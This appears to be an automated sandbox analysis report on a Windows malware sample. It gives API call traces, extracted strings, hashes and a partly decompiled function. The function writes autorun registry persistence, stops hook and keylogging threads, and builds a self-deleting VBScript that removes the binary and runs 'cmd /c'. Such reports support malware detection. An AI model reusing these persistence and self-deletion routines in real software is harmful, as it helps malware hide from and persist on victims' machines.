                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407EC2
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ECB
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ED3
                                  • wcscmp.MSVCRT ref: 00407EE0
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?), ref: 00407EF1
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407F1D
                                  • CopyFileW.KERNEL32(0041BA5C,00000000), ref: 00407F25
                                  • wcslen.MSVCRT ref: 00407F40
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00415A24,?), ref: 00407F65
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415A24,?), ref: 00407F72
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407F7D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407F86
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407F8F
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407FAB
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407FB4
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407FBE
                                  • CopyFileW.KERNEL32(0041BA5C,00000000), ref: 00407FC6
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(0041BA5C), ref: 00407FD3
                                    • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00407FE5
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000007), ref: 00408010
                                  • SetFileAttributesW.KERNEL32(00000000), ref: 0040801D
                                  • wcslen.MSVCRT ref: 00408022
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000007), ref: 00408034
                                  • SetFileAttributesW.KERNEL32(00000000), ref: 0040803B
                                  • _wgetenv.MSVCRT ref: 0040804B
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00408056
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408061
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040806C
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(WScript.Sleep 1000,?), ref: 0040807E
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(Set fso = CreateObject("Scripting.FileSystemObject")), ref: 0040808C
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041BA5C,?,00415628,0041623C), ref: 004080B0
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(fso.DeleteFile ,?,00415628,00000000), ref: 004080C4
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004080CF
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004080DC
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004080E9
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004080F6
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408102
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040810B
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408114
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040811D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408126
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040812F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408138
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(""", 0,?,0041623C), ref: 0040814B
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(CreateObject("WScript.Shell").Run "cmd /c "",?,0041BA28,00000000), ref: 00408163
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040816E
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040817B
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408188
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408194
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040819D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081A6
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081AF
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081B8
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081C1
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(fso.DeleteFile(Wscript.ScriptFullName)), ref: 004081CF
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004081DB
                                  • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 004081E5
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004081F1
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 0040820F
                                  • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040821C
                                  • exit.MSVCRT ref: 00408228
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408231
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040823A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@$G@2@@0@Hstd@@V?$basic_string@$?c_str@?$basic_string@$V01@V10@$??0?$basic_string@G@1@@$V01@@$??4?$basic_string@$FileY?$basic_string@$V10@0@wcslen$AttributesCopy$?length@?$basic_string@CreateDirectoryExecuteShell_wgetenvexitwcscmp
                                  • String ID: """, 0$6$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open
                                  • API String ID: 740851534-1662879639
                                  • Opcode ID: c2578ae67f88c1497f1631fdec083d5472b1fbbad6355d734e44e4e7541f9765
                                  • Instruction ID: 2c5ee03a622c4f430e0af795343514bbf493609e2573cf328c1cc28c00924062
                                  • Opcode Fuzzy Hash: c2578ae67f88c1497f1631fdec083d5472b1fbbad6355d734e44e4e7541f9765
                                  • Instruction Fuzzy Hash: 57C15D7290051DEBCB04AFE0EC49DEE7B3CFF54345B44802AF916A71A0EB789945CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 20%
                                  			E004085AC(char _a4) {
                                  				signed int _v5;
                                  				char _v6;
                                  				char _v24;
                                  				char _v40;
                                  				char _v56;
                                  				char _v72;
                                  				char _v88;
                                  				void* _v104;
                                  				void* _v120;
                                  				short _v640;
                                  				void* _t63;
                                  				char* _t65;
                                  				WCHAR* _t68;
                                  				char* _t69;
                                  				char* _t71;
                                  				char* _t74;
                                  				char* _t75;
                                  				char* _t76;
                                  				char* _t77;
                                  				signed int* _t79;
                                  				char* _t80;
                                  				char* _t81;
                                  				signed int _t82;
                                  				short* _t84;
                                  				char* _t85;
                                  				char* _t86;
                                  				WCHAR* _t88;
                                  				char* _t89;
                                  				char* _t90;
                                  				short* _t154;
                                  				void* _t161;
                                  				void* _t162;
                                  				void* _t164;
                                  				void* _t166;
                                  
                                  				_t63 = E0040AC8C();
                                  				if( *0x41b154 != 0x30) {
                                  					_t63 = E00406D41(0x41b900);
                                  				}
                                  				if( *0x41c118 == 1) {
                                  					_t63 = E0041050F(_t63);
                                  				}
                                  				if( *0x41b22a != 0) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					_t63 = E00412BEE(_t63);
                                  				}
                                  				_t94 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
                                  				if( *0x41ba58 == 1) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					_t63 = E0040B9E8(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", _t63);
                                  					_t161 = _t161 + 0xc;
                                  				}
                                  				if( *0x41bc64 == 1) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					_t63 = E0040B9E8(0x80000002, _t94, _t63);
                                  					_t161 = _t161 + 0xc;
                                  				}
                                  				if( *0x41ba20 == 1) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					_t63 = E0040B9E8(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _t63);
                                  					_t161 = _t161 + 0xc;
                                  				}
                                  				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				_t65 = E0040B692(0x80000001,  &_v640, "exepath",  &_v640, 0x208, _t63, _t63);
                                  				_t162 = _t161 + 0x1c;
                                  				if(_t65 == 0) {
                                  					_t65 = GetModuleFileNameW(0,  &_v640, 0x208);
                                  				}
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				RegDeleteKeyA(0x80000001, _t65);
                                  				_v5 = 1;
                                  				_t68 = SetFileAttributesW( &_v640, 0x80);
                                  				if(_t68 == 0) {
                                  					_v5 = _v5 & _t68;
                                  				}
                                  				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
                                  				if(_t68 != 0) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					SetFileAttributesW(_t68, 0x80);
                                  				}
                                  				_t69 =  &_v6;
                                  				__imp___wgetenv(L"Temp", _t69, L"\\update.vbs");
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t69);
                                  				L00414146();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v88, _t69);
                                  				_t71 =  &_v6;
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n", _t71);
                                  				L0041416A();
                                  				_t164 = _t162 + 0x18;
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v40, L"On Error Resume Next\n", _t71);
                                  				if(_v5 != 0) {
                                  					_t88 =  &_v640;
                                  					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t88,  &_v6, L"\")\n");
                                  					_t89 =  &_v72;
                                  					L0041416A();
                                  					_t90 =  &_v24;
                                  					L00414146();
                                  					_t164 = _t164 + 0x18;
                                  					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t90, _t90, _t89, _t89, L"while fso.FileExists(\"", _t88);
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				}
                                  				_t154 = L"\"\n";
                                  				_t74 =  &_v6;
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"fso.DeleteFile \"", _t74,  &_v640, _t154);
                                  				_t75 =  &_v72;
                                  				L00414146();
                                  				_t76 =  &_v56;
                                  				L00414146();
                                  				_t166 = _t164 + 0x18;
                                  				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t76, _t76, _t75, _t75, _t74);
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				if(_v5 != 0) {
                                  					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"wend\n");
                                  				}
                                  				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
                                  				if(_t76 != 0) {
                                  					_t85 =  &_v72;
                                  					L0041416A();
                                  					_t86 =  &_v56;
                                  					L00414146();
                                  					_t166 = _t166 + 0x18;
                                  					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t86, _t86, _t85, _t85, L"fso.DeleteFolder \"", 0x41bc68, _t154);
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				}
                                  				_t77 =  &_v6;
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"\"\"\", 0", _t77, "\n");
                                  				_t79 =  &_v5;
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\"", _t79,  &_a4, _t77);
                                  				_t80 =  &_v24;
                                  				L0041414C();
                                  				_t81 =  &_v72;
                                  				L0041414C();
                                  				_t82 =  &_v56;
                                  				L00414146();
                                  				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t82, _t82, _t81, _t81, _t80, _t80, _t79);
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"fso.DeleteFile(Wscript.ScriptFullName)");
                                  				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  				__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ();
                                  				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  				_t84 = E00412D56( &_v40, _t82 << 1, _t82 << 1, _t82, 0);
                                  				if(_t84 != 0) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					_t84 = ShellExecuteW(0, L"open", _t84, 0x415800, 0x415800, 0);
                                  					if(_t84 > 0x20) {
                                  						exit(0);
                                  					}
                                  				}
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				return _t84;
			}

                                  APIs
                                    • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                    • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004085E9
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000004,0041B310,00000000), ref: 00408613
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000004,0041B310,00000000), ref: 0040862F
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000004,0041B310,00000000), ref: 0040864F
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000004,0041B310,00000000), ref: 0040866F
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00408678
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,?,00000208,00000000), ref: 00408698
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 004086B6
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 004086BE
                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 004086C6
                                  • SetFileAttributesW.KERNEL32(?,00000080), ref: 004086E3
                                  • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 004086F7
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000080), ref: 00408709
                                  • SetFileAttributesW.KERNEL32(00000000), ref: 00408710
                                    • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000528A,00000000,00000004,0041B310,004085CD), ref: 00406D56
                                    • Part of subcall function 00406D41: UnhookWindowsHookEx.USER32(00000000), ref: 00406D5F
                                    • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000526A,00000000), ref: 00406D6F
                                  • _wgetenv.MSVCRT ref: 00408720
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 0040872B
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408736
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408741
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(Set fso = CreateObject("Scripting.FileSystemObject"),?), ref: 00408753
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,On Error Resume Next,00000000), ref: 00408763
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040876E
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,")), ref: 0040878D
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,while fso.FileExists(",00000000), ref: 0040879D
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004087AA
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004087B6
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004087BF
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004087C8
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004087D1
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(fso.DeleteFile ",?,?,00416354), ref: 004087F0
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004087FB
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408808
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408814
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040881D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408826
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040882F
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(wend), ref: 00408843
                                  • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 00408850
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,fso.DeleteFolder ",0041BC68,00416354), ref: 00408867
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00416354), ref: 00408874
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00416354), ref: 00408880
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 00408889
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 00408892
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(""", 0,?,0041623C), ref: 004088A9
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(CreateObject("WScript.Shell").Run "cmd /c "",00000000,?,00000000), ref: 004088C0
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004088CB
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004088D8
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004088E5
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004088F1
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004088FA
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408903
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040890C
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408915
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040891E
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(fso.DeleteFile(Wscript.ScriptFullName)), ref: 0040892C
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408938
